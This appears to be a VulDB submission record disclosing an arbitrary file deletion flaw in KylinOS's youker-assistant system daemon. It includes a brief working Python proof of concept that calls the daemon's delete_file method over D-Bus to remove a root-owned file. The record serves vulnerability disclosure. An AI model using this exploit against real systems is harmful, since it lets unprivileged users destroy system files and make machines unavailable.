| Title | Kylin OS youker-assistant arbitrary file delete vuln |
|---|
| Description | Report
Describe
youker-assistant is an integrated tool on KylinOS Desktop to help perform daily system maintenance tasks. The delete_file in this program has an arbitrary file deletion vulnerability, which can cause the system to be unavailable.
Hazard level
High
Affected version
youker-assistant < 3.0.2-0kylin6k70-23
POC&&EXP
ISO Download:
https://distro-images.kylinos.cn:8802/web_pungi/download/share/HXDYtGjZm3daA4UvOTLkiPl1nB9ErM0c/
exploit.py
import dbus
filepath = "/root/test"
bus = dbus.SystemBus()
obj = bus.get_object('com.kylin.assistant.systemdaemon','/com/kylin/assistant/systemdaemon')
obj.delete_file(filepath,dbus_interface = 'com.kylin.assistant.systemdaemon') |
|---|
| Source | ⚠️ https://github.com/i900008/vulndb/blob/main/kylinos_vul4.md |
|---|
| User | Set3r.Pan (UID 28571) |
|---|
| Submission | 05/22/2023 09:38 (3 years ago) |
|---|
| Moderation | 06/05/2023 07:08 (14 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 230689 [KylinSoft youker-assistant prior 3.0.2-0kylin6k70-23 on KylinOS Arbitrary File dbus.SystemBus delete_file access control] |
|---|
| Points | 20 |
|---|